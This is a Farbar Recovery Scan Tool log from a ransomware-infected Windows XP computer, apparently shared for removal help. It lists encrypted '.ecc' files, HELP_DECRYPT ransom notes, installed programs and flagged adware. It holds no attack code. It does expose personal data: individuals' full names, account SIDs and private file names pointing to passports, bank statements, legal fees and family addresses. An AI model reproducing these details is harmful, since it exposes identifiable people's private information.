2015-02-24 22:48 - 2014-07-27 12:58 - 00016900 _____ () C:\Documents and Settings\michelle coe\My Documents\interview in special education setting.docx.ecc
2015-02-24 22:48 - 2014-07-27 12:35 - 00015684 _____ () C:\Documents and Settings\michelle coe\My Documents\Friendship Circle.docx.ecc
2015-02-24 22:48 - 2014-07-24 11:53 - 00014644 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal 6 Charmagne Westphal.docx.ecc
2015-02-24 22:48 - 2014-07-22 09:16 - 00015700 _____ () C:\Documents and Settings\michelle coe\My Documents\Choice Project #2l.docx.ecc
2015-02-24 22:48 - 2014-07-20 22:34 - 00010948 _____ () C:\Documents and Settings\michelle coe\My Documents\Doc1.docx.ecc
2015-02-24 22:48 - 2014-07-20 20:10 - 00014116 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal 5.docx.ecc
2015-02-24 22:48 - 2014-07-13 21:10 - 00014308 _____ () C:\Documents and Settings\michelle coe\My Documents\Beckys life chapter 2.docx.ecc
2015-02-24 22:48 - 2014-07-13 17:36 - 00016948 _____ () C:\Documents and Settings\michelle coe\My Documents\Choice Project 1.docx.ecc
2015-02-24 22:48 - 2014-07-10 07:00 - 00015220 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal 4.docx.ecc
2015-02-24 22:48 - 2014-07-09 08:41 - 00014260 _____ () C:\Documents and Settings\michelle coe\My Documents\Checklist for existing facilities.docx.ecc
2015-02-24 22:48 - 2014-07-06 17:46 - 00014228 _____ () C:\Documents and Settings\michelle coe\My Documents\Individual Class Plan.docx.ecc
2015-02-24 22:48 - 2014-07-06 16:31 - 00015140 _____ () C:\Documents and Settings\michelle coe\My Documents\Journal 2.docx.ecc
2015-02-24 22:48 - 2014-07-01 12:36 - 00021716 _____ () C:\Documents and Settings\michelle coe\My Documents\first journal.docx.ecc
2015-02-24 22:48 - 2014-06-30 09:21 - 00012052 _____ () C:\Documents and Settings\michelle coe\My Documents\ipad apps.docx.ecc
2015-02-24 22:48 - 2014-06-30 08:20 - 00012548 _____ () C:\Documents and Settings\michelle coe\My Documents\five special education websites.docx.ecc
2015-02-24 22:34 - 2015-01-28 22:45 - 00013380 _____ () C:\Documents and Settings\michelle coe\Desktop\Thinking about Inclusive Education 2015.docx.ecc
2015-02-24 22:34 - 2015-01-21 11:52 - 00013492 _____ () C:\Documents and Settings\michelle coe\Desktop\Thinking about Inclusive education.docx.ecc
2015-02-24 22:34 - 2014-12-08 12:35 - 00015492 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Writing Analysis Perceptual.docx.ecc
2015-02-24 22:34 - 2014-12-08 12:15 - 00020548 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Final Reflections Summary.docx.ecc
2015-02-24 22:34 - 2014-12-05 14:15 - 00020548 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Reflections Summary.docx.ecc
2015-02-24 22:34 - 2014-12-04 12:37 - 00012740 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Article #3.docx.ecc
2015-02-24 22:34 - 2014-12-03 19:23 - 00014836 _____ () C:\Documents and Settings\michelle coe\Desktop\MARS PROJECT OVERVIEW REVISED.docx.ecc
2015-02-24 22:34 - 2014-12-03 18:35 - 00012484 _____ () C:\Documents and Settings\michelle coe\Desktop\Websites for Webquest.docx.ecc
2015-02-24 22:34 - 2014-12-03 18:14 - 00014836 _____ () C:\Documents and Settings\michelle coe\Desktop\MARS PROJECT OVERVIEW.docx.ecc
2015-02-24 22:34 - 2014-12-02 17:56 - 00028292 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal CASE STUDY QUESTION 2014.docx.ecc
2015-02-24 22:34 - 2014-11-20 10:43 - 00016276 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal DIGITAL STORYTELLING.docx.ecc
2015-02-24 22:34 - 2014-11-18 12:55 - 00014468 _____ () C:\Documents and Settings\michelle coe\Desktop\reflection on Unicorns are real.docx.ecc
2015-02-24 22:34 - 2014-11-17 11:55 - 00027908 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal CASE STUDY 2014.docx.ecc
2015-02-24 22:34 - 2014-10-28 10:15 - 00018340 _____ () C:\Documents and Settings\michelle coe\Desktop\Charmagne Westphal Book reflection Brilliant Idiot.docx.ecc
2015-02-24 22:31 - 2015-01-10 13:01 - 00092436 _____ () C:\Documents and Settings\Administrator\My Documents\US1412B6S008020.Eticket.pdf.ecc
2015-02-24 22:31 - 2014-10-14 00:06 - 00014948 _____ () C:\Documents and Settings\Administrator\My Documents\There have been many incidences of animals being cloned in the laboratory.docx.ecc
2015-02-24 22:31 - 2014-09-02 18:00 - 00015892 _____ () C:\Documents and Settings\Administrator\My Documents\Letter that changed my life.docx.ecc
2015-02-24 22:31 - 2014-05-20 17:10 - 00040084 _____ () C:\Documents and Settings\Administrator\My Documents\Geneva.docx.ecc
2015-02-24 22:31 - 2014-05-11 15:04 - 00013828 _____ () C:\Documents and Settings\Administrator\My Documents\Fruitvale Station.docx.ecc
2015-02-24 22:31 - 2014-03-25 20:20 - 00013588 _____ () C:\Documents and Settings\Administrator\My Documents\lord of the flies discussion paper.docx.ecc
2015-02-24 22:31 - 2013-10-07 23:35 - 00012788 _____ () C:\Documents and Settings\Administrator\My Documents\food industry madison.docx.ecc
2015-02-24 22:31 - 2013-07-01 13:28 - 00016036 _____ () C:\Documents and Settings\Administrator\My Documents\Sched J 06.25.13.pdf.ecc
2015-02-24 22:31 - 2013-06-04 21:11 - 00093956 _____ () C:\Documents and Settings\Administrator\My Documents\Drawing2.2.dwg.ecc
2015-02-24 22:31 - 2013-01-12 13:28 - 01812644 _____ () C:\Documents and Settings\Administrator\My Documents\guide.pdf.ecc
2015-02-24 22:31 - 2013-01-12 13:25 - 00510116 _____ () C:\Documents and Settings\Administrator\My Documents\No Load Fund X dec152012.pdf.ecc
2015-02-24 22:31 - 2012-10-14 20:08 - 00059044 _____ () C:\Documents and Settings\Administrator\My Documents\Statement12302011 indiv.pdf.ecc
2015-02-24 22:31 - 2012-10-14 20:07 - 00070788 _____ () C:\Documents and Settings\Administrator\My Documents\Statement12302011.pdf.ecc
2015-02-24 22:31 - 2012-10-14 20:07 - 00069812 _____ () C:\Documents and Settings\Administrator\My Documents\Statement09282012.pdf.ecc
2015-02-24 22:31 - 2012-10-14 19:57 - 00209828 _____ () C:\Documents and Settings\Administrator\My Documents\STMT_12302011_XXXXX955_PriorityClientStmt.pdf.ecc
2015-02-24 22:31 - 2012-08-28 17:28 - 00604084 _____ () C:\Documents and Settings\Administrator\My Documents\Sub Zero 600ucguide.pdf.ecc
2015-02-24 22:31 - 2012-06-30 09:32 - 00013588 _____ () C:\Documents and Settings\Administrator\My Documents\Thank you all for coming to celebrate the life of our sister Julie.docx.ecc
2015-02-24 22:31 - 2012-06-26 21:48 - 00011892 _____ () C:\Documents and Settings\Administrator\My Documents\Julie Ann Shoner.docx.ecc
2015-02-24 22:31 - 2012-06-21 18:04 - 00012900 _____ () C:\Documents and Settings\Administrator\My Documents\Fax.docx.ecc
2015-02-24 22:31 - 2012-06-21 17:39 - 00011348 _____ () C:\Documents and Settings\Administrator\My Documents\June 21st.docx.ecc
2015-02-24 22:31 - 2012-03-14 16:42 - 00011540 _____ () C:\Documents and Settings\Administrator\My Documents\I.docx.ecc
2015-02-24 22:31 - 2012-01-28 16:55 - 06850324 _____ () C:\Documents and Settings\Administrator\My Documents\VZW_SCH-I510_DROID_CHARGE_English_User_Manual.pdf.ecc
2015-02-24 22:31 - 2012-01-08 21:58 - 00134004 _____ () C:\Documents and Settings\Administrator\My Documents\Passport.jpg.ecc
2015-02-24 22:31 - 2011-12-09 20:07 - 00014356 _____ () C:\Documents and Settings\Administrator\My Documents\rogue killer.docx.ecc
2015-02-24 22:31 - 2011-10-18 17:22 - 00015684 _____ () C:\Documents and Settings\Administrator\My Documents\Underwriters Laboratories.docx.ecc
2015-02-24 22:31 - 2011-05-30 13:23 - 00012468 _____ () C:\Documents and Settings\Administrator\My Documents\Nicholas A.docx.ecc
2015-02-24 22:31 - 2010-10-12 19:16 - 00079732 _____ () C:\Documents and Settings\Administrator\My Documents\Michelle and Nick at Kruse and Muer.jpg.ecc
2015-02-24 22:31 - 2010-08-18 17:51 - 00061812 _____ () C:\Documents and Settings\Administrator\My Documents\Grasshopper 6052 mower deck drawing.jpg.ecc
2015-02-24 22:31 - 2010-07-06 19:14 - 02243412 _____ () C:\Documents and Settings\Administrator\My Documents\Jenn Air 730-0336 manual.pdf.ecc
2015-02-24 22:31 - 2010-06-18 19:01 - 00333924 _____ () C:\Documents and Settings\Administrator\My Documents\Gosling Triathlon Road Course.jpg.ecc
2015-02-24 22:31 - 2010-05-29 14:38 - 00000196 ____H () C:\Documents and Settings\Administrator\My Documents\~$uipment Model Numbers and Specifications.docx.ecc
2015-02-24 22:31 - 2010-01-24 19:00 - 01219748 _____ () C:\Documents and Settings\Administrator\My Documents\FORM LETTER #28 10 - 01 13.pdf.ecc
2015-02-24 22:31 - 2010-01-24 18:48 - 00195908 _____ () C:\Documents and Settings\Administrator\My Documents\FIRST REMEDIAL ORDER 08 - 02.07.pdf.ecc
2015-02-24 22:31 - 2010-01-24 18:48 - 00055924 _____ () C:\Documents and Settings\Administrator\My Documents\FORM LETTER #28 10 - 01.13.pdf.ecc
2015-02-24 22:31 - 2009-12-12 17:21 - 00174292 _____ () C:\Documents and Settings\Administrator\My Documents\Martz Barn.jpg.ecc
2015-02-24 22:31 - 2009-10-24 20:40 - 00010692 _____ () C:\Documents and Settings\Administrator\My Documents\Equipment Model Numbers and Specifications.docx.ecc
2015-02-24 22:31 - 2009-09-19 22:09 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Active Home Professional
2015-02-24 22:31 - 2009-09-10 19:00 - 00022660 _____ () C:\Documents and Settings\Administrator\My Documents\Honda Letter.docx.ecc
2015-02-24 22:31 - 2009-08-23 12:10 - 00015492 _____ () C:\Documents and Settings\Administrator\My Documents\Family Addresses.docx.ecc
2015-02-24 22:30 - 2015-01-22 17:08 - 00016756 _____ () C:\Documents and Settings\Administrator\My Documents\C8.1 Worksheet.docx.ecc
2015-02-24 22:30 - 2014-09-17 22:42 - 00012900 _____ () C:\Documents and Settings\Administrator\My Documents\Descriptive essay ms. clark.docx.ecc
2015-02-24 22:30 - 2014-09-16 22:39 - 00013060 _____ () C:\Documents and Settings\Administrator\My Documents\College Essay 2.docx.ecc
2015-02-24 22:30 - 2014-09-09 22:17 - 00010820 _____ () C:\Documents and Settings\Administrator\My Documents\Debate athletic.docx.ecc
2015-02-24 22:30 - 2014-06-21 11:57 - 00120452 _____ () C:\Documents and Settings\Administrator\My Documents\9584  Cambridge.jpg.ecc
2015-02-24 22:30 - 2014-06-08 21:40 - 00016788 _____ () C:\Documents and Settings\Administrator\My Documents\Argo.docx.ecc
2015-02-24 22:30 - 2013-10-28 14:47 - 01043508 _____ () C:\Documents and Settings\Administrator\My Documents\CCF00192013_00000.jpg.ecc
2015-02-24 22:30 - 2013-07-01 13:29 - 00069668 _____ () C:\Documents and Settings\Administrator\My Documents\2013-06-14 Fee Agreement - Westphal CAW.doc.ecc
2015-02-24 22:30 - 2013-07-01 13:19 - 00075300 _____ () C:\Documents and Settings\Administrator\My Documents\2013 Resume.doc.ecc
2015-02-24 22:30 - 2013-07-01 13:17 - 00075300 _____ () C:\Documents and Settings\Administrator\My Documents\Current Resume 2013.doc.ecc
2015-02-24 22:30 - 2013-05-23 14:55 - 00024564 _____ () C:\Documents and Settings\Administrator\My Documents\Citizen's loss statement..xlsx1.htm.ecc
2015-02-24 22:30 - 2013-05-23 14:49 - 00126772 _____ () C:\Documents and Settings\Administrator\My Documents\Citizen's loss statement..xlsx.ecc
2015-02-24 22:30 - 2013-01-17 19:05 - 00431908 _____ () C:\Documents and Settings\Administrator\My Documents\600installguide.pdf.ecc
2015-02-24 22:30 - 2012-10-14 19:34 - 00306100 _____ () C:\Documents and Settings\Administrator\My Documents\ATT tax statement 2011.pdf.ecc
2015-02-24 22:30 - 2012-02-25 18:18 - 00081700 _____ () C:\Documents and Settings\Administrator\My Documents\dana.jpg.ecc
2015-02-24 22:30 - 2011-02-13 17:44 - 03292836 _____ () C:\Documents and Settings\Administrator\My Documents\Desa HDB20NT manual.pdf.ecc
2015-02-24 22:30 - 2011-01-01 00:17 - 00013060 _____ () C:\Documents and Settings\Administrator\My Documents\black ops zombies cheat codes.docx.ecc
2015-02-24 22:30 - 2010-02-27 18:28 - 00292468 _____ () C:\Documents and Settings\Administrator\My Documents\Billy Cole Letters.jpg.ecc
2015-02-24 22:20 - 2014-03-07 00:19 - 00013860 _____ () C:\ComboFix.txt.ecc
2015-02-24 22:20 - 2010-07-22 21:58 - 00000000 ____D () C:\730a5b28e0537a10fd4bec56
2015-02-24 22:20 - 2010-07-22 21:57 - 00000000 ____D () C:\93a343f86e24ae072814e075
2015-02-24 22:20 - 2009-08-09 21:42 - 00000000 ____D () C:\75c5ef836965d6281c4e31c06682
2015-02-22 12:19 - 2012-12-10 18:43 - 00701616 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2015-02-22 12:19 - 2012-12-10 18:43 - 00071344 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2015-02-22 04:35 - 2009-08-09 19:39 - 00000000 ____D () C:\Documents and Settings\Administrator
2015-02-20 17:14 - 2014-09-11 10:07 - 00000000 ____D () C:\SmartDraw CI
2015-02-20 17:02 - 2010-12-29 15:15 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Application Data\PCHealth
2015-02-20 17:02 - 2010-12-12 12:19 - 00000000 ____D () C:\Documents and Settings\michelle coe
2015-02-20 17:02 - 2010-07-22 00:09 - 00000000 ____D () C:\Documents and Settings\NetworkService\Application Data\Adobe
2015-02-20 17:02 - 2009-08-09 19:27 - 00000000 __SHD () C:\Documents and Settings\NetworkService
2015-02-20 16:59 - 2015-02-04 14:58 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\Application Data\Skype
2015-02-20 16:59 - 2010-12-12 12:20 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\Application Data\Mozilla
2015-02-20 16:57 - 2013-10-14 10:06 - 00000000 ____D () C:\Documents and Settings\michelle coe\Local Settings\Application Data\Google
2015-02-20 15:46 - 2010-12-12 12:26 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\Sun
2015-02-20 15:45 - 2010-12-12 12:22 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\Adobe
2015-02-20 15:45 - 2010-12-12 12:20 - 00000000 ____D () C:\Documents and Settings\michelle coe\Application Data\Mozilla
2015-02-20 15:45 - 2009-08-09 19:38 - 00000000 __SHD () C:\Documents and Settings\LocalService
2015-02-20 15:42 - 2013-06-04 17:19 - 00000000 ____D () C:\Autodesk
2015-02-20 15:42 - 2010-12-13 16:49 - 00000000 ____D () C:\ActiveHome Pro
2015-02-20 15:42 - 2009-10-09 15:01 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Logitech
2015-02-20 15:42 - 2009-08-10 01:13 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2015-02-20 15:42 - 2009-08-10 01:02 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\NOS
2015-02-15 01:07 - 2014-03-31 13:15 - 00000230 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job

==================== Files in the root of some directories =======

2009-08-16 22:54 - 2009-08-16 22:54 - 0036623 _____ () C:\Documents and Settings\Administrator\Application Data\Comma Separated Values (Windows).ADR
2015-02-24 22:20 - 2015-02-25 03:34 - 0000636 _____ () C:\Documents and Settings\Administrator\Application Data\key.dat
2015-02-24 22:20 - 2015-02-25 03:34 - 87668868 _____ () C:\Documents and Settings\Administrator\Application Data\log.html
2015-03-01 12:59 - 2015-03-01 12:59 - 0000105 _____ () C:\Documents and Settings\Administrator\Application Data\mbam.context.scan
2009-09-06 12:10 - 2009-12-26 08:12 - 0022328 _____ () C:\Documents and Settings\Administrator\Application Data\PnkBstrK.sys
2009-08-10 15:44 - 2014-01-19 10:28 - 0009216 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-12-05 18:08 - 2011-12-09 19:43 - 0015066 ___SH () C:\Documents and Settings\Administrator\Local Settings\Application Data\v6ty32s6fy3mfn
2015-02-20 15:44 - 2015-02-20 15:44 - 0008630 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-20 15:44 - 2015-02-20 15:44 - 0045665 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.PNG
2015-02-20 15:44 - 2015-02-20 15:44 - 0004258 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.TXT
2015-02-20 15:44 - 2015-02-20 15:44 - 0000292 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL

Some content of TEMP:
====================
C:\Documents and Settings\michelle coe\Local Settings\temp\sysrestore.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 11-03-2015
Ran by Administrator at 2015-03-14 13:07:55
Running from F:\
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Disabled - Out of date) {EDB4FA23-53B8-4AFA-8C5D-99752CCA7095}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.0.2.12610 - Adobe Systems Inc.)
Adobe Download Manager (HKLM\...\{E2883E8F-472F-4fb0-9522-AC9BF37916A7}) (Version: 1.6.2.63 - NOS Microsystems Ltd.)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.08) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM\...\Adobe Shockwave Player) (Version: 11.5.1.601 - Adobe Systems, Inc.)
Amazing Adventures: The Lost Tomb (HKLM\...\Steam App 3510) (Version: - PopCap)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5751 - AVG Technologies)
AVG 2015 (Version: 15.0.4306 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5751 - AVG Technologies) Hidden
Brother MFL-Pro Suite (HKLM\...\{D83BD5E2-5AF4-49F6-B5C1-484A9760E73D}) (Version: 1.00.000 - )
Call of Duty® - World at War™ (HKLM\...\InstallShield_{D80A6A73-E58A-4673-AFF5-F12D7110661F}) (Version: 1.0 - Activision)
Call of Duty® - World at War™ (Version: 1.0 - Activision) Hidden
Call of Duty: Black Ops - Multiplayer (HKLM\...\Steam App 42710) (Version: - Treyarch)
Call of Duty: Black Ops (HKLM\...\Steam App 42700) (Version: - Treyarch)
Call of Duty: Modern Warfare 2 - Multiplayer (HKLM\...\Steam App 10190) (Version: - Infinity Ward)
Call of Duty: Modern Warfare 2 (HKLM\...\Steam App 10180) (Version: - Infinity Ward)
CCleaner (HKLM\...\CCleaner) (Version: 4.10 - Piriform)
Critical Update for Windows Media Player 11 (KB959772) (HKLM\...\KB959772_WM11) (Version: - Microsoft Corporation)
DWG TrueView 2013 (HKLM\...\DWG TrueView 2013) (Version: 19.0.55.0 - Autodesk)
DWG TrueView 2013 (Version: 19.0.55.0 - Autodesk) Hidden
Elite Unzip (HKLM\...\Elite Unzip) (Version: 1.1.7640.260 - Mindspark Interactive Network) <==== ATTENTION
ffdshow v1.2.4422 [2012-04-09] (HKLM\...\ffdshow_is1) (Version: 1.2.4422.0 - )
Foxit PDF Creator Toolbar Updater (HKU\S-1-5-21-484763869-1604221776-1801674531-1004\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.1.23037 - Ask.com) <==== ATTENTION
Foxit PDF Editor (HKLM\...\Foxit PDF Editor) (Version: 2.2.0.0205 - Foxit Software)
Foxit Reader (HKLM\...\Foxit Reader) (Version: - )
Google Chrome (HKLM\...\Google Chrome) (Version: 40.0.2214.115 - Google Inc.)
Google Earth (HKLM\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Earth (HKLM\...\{96AD3B61-EAE2-11E2-9E72-B8AC6F98CCE3}) (Version: 7.1.1.1888 - Google)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
Haali Media Splitter (HKLM\...\HaaliMkx) (Version: - FreeCodecPack)
LG USB Modem Drivers (HKLM\...\{FA02ACAC-9E14-4878-A257-92A22A647C2C}) (Version: 4.8.1 - LG Electronics)
Logitech QuickCam for Enterprise (HKLM\...\{70BA588C-DA92-4DA9-8F8F-E7124B26F8F5}) (Version: 11.72.1072 - Logitech Inc.)
Logitech QuickCam for Enterprise Driver Package (HKLM\...\lvdrivers_11.72) (Version: - )
Malwarebytes' Anti-Malware version 1.51.2.1300 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.51.2.1300 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version: - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version: - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version: - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Base Smart Card Cryptographic Service Provider Package (HKLM\...\KB909520) (Version: - Microsoft Corporation)
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002E-0000-0000-0000000FF1CE}_ULTIMATER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Ultimate 2007 (HKLM\...\ULTIMATER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.3.215.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version: - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 18.0 (x86 en-US) (HKLM\...\Mozilla Firefox 18.0 (x86 en-US)) (Version: 18.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MyPC Backup (HKLM\...\MyPC Backup) (Version: - JDi Backup Ltd) <==== ATTENTION
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.3 - NVIDIA Corporation)
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
PaperPort (HKLM\...\{A17EABB6-D0C6-44E5-820C-72DC7F495064}) (Version: 9.02.0814 - ScanSoft, Inc.)
PunkBuster Services (HKLM\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
RCA Detective™ 2.0.0.98 (HKLM\...\RCA Detective™_is1) (Version: - RCA)
RCA Digital Voice Manager 5.0.3.1 (HKLM\...\RCA Digital Voice Manager_is1) (Version: - RCA)
RealFlight G2 Simulator (HKLM\...\RealFlight2) (Version: - )
RealFlight G3 R/C Simulator (HKLM\...\RealFlightG3Pro) (Version: - )
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - Realtek Semiconductor Corp.)
Search Protect (HKLM\...\SearchProtect) (Version: 2.18.20.209 - Search Protect) <==== ATTENTION
Skype™ 7.1 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.1.105 - Skype Technologies S.A.)
Speed Test (HKLM\...\Speed Test) (Version: 4.1.0.0 - BestOffers) <==== ATTENTION
Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 7.12.4.0 - )
UnknownFile (HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\UnknownFile) (Version: 1.0.0.0 - UnknownFile) <==== ATTENTION!
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002E-0000-0000-0000000FF1CE}_ULTIMATER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Viber (HKU\S-1-5-21-484763869-1604221776-1801674531-500\...\Viber) (Version: 4.4.0.134678 - Viber Media Inc)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 1.0.1 (HKLM\...\VLC media player) (Version: 1.0.1 - VideoLAN Team)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.9.0040.0 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version: - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\WGA) (Version: 1.7.0069.2 - Microsoft Corporation)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Management Framework Core (HKLM\...\KB968930) (Version: - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version: - )
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version: - )
Yahoo! Toolbar (HKLM\...\Yahoo! Companion) (Version: - Yahoo! Inc.)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{043AC599-453E-4C44-82B0-6793DE8983C0}\InprocServer32 -> C:\Documents and Settings\All Users\Application Data\{8CCDBBA6-E8EE-4844-9F07-469DCB5F2C87}\secproc. (the data entry has 11 more characters).
CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{3faa4380-a399-11cf-a466-00805fe418f6}\InprocServer32 -> C:\Program Files\Autodesk\DWG TrueView 2013\en-US\dwgviewrficn.dll (Autodesk, Inc.)
